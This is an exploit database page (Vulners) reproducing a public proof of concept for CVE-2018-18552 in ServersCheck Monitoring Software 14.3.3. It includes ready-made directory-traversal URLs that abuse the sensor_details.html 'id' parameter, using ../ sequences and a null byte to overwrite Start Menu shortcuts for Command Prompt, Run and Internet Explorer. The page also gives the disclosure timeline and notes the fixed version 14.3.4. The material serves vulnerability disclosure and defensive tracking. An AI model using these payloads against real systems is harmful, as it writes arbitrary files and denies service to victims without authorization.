Vulners
Lucene search
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | ServersCheck Monitoring Software 14.3.3 - Denial of Service Exploit | 23 Oct 201800:00 | – | zdt |
 | CVE-2018-18552 | 24 Oct 201822:00 | – | cve |
 | CVE-2018-18552 | 24 Oct 201822:00 | – | cvelist |
 | EUVD-2018-10272 | 7 Oct 202500:30 | – | euvd |
 | ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write | 23 Oct 201800:00 | – | exploitpack |
 | CVE-2018-18552 | 24 Oct 201822:29 | – | nvd |
 | CVE-2018-18552 | 24 Oct 201822:29 | – | osv |
 | ServersCheck Monitoring Software 14.3.3 Arbitrary File Write / DoS | 23 Oct 201800:00 | – | packetstorm |
 | Directory traversal | 24 Oct 201822:29 | – | prion |
# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
# Author: John Page (aka hyp3rlinx)
# Date: 2018-10-23
# Vendor: www.serverscheck.com
# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe
# CVE: N/A
# References:
# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt
# https://serverscheck.com/monitoring-software/release.asp
# Affected Component: "sensor_details.html" webpage the "id" parameter
# Security Issue
# ServersCheck Monitoring Software allows remote attackers to cause a denial of service
# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this
# second LNK file is associated with a Start menu item. Ultimately, this behavior comes
# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows
# creating empty files in arbitrary directories.
# Exploit/POC
# DOS Command Prompt .LNK under Start Menu change <VICTIM> to desired user.
http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00
# DOS Run .LNK under Start Menu
http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00
# DOS Internet Explorer .LNK from Start Menu
http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00
# Victim will get error message from server like "Error retrieving sensor details from database".
# Then,No Internet Explorer, Command or Run prompt via the Start/Programs/Accessories/
# and Task Menu links. However, can still be launch by other means. Tested successfully on
# Windows 7 OS
# [Disclosure Timeline]
# Vendor Notification: October 6, 2018
# Vendor acknowledgement: October 7, 2018
# Vendor release v14.3.4 : October 7th, 2018
# CVE assign by Mitre: October 21, 2018
# October 22, 2018 : Public DisclosureData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Oct 2018 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
CVSS 36.5
EPSS0.02202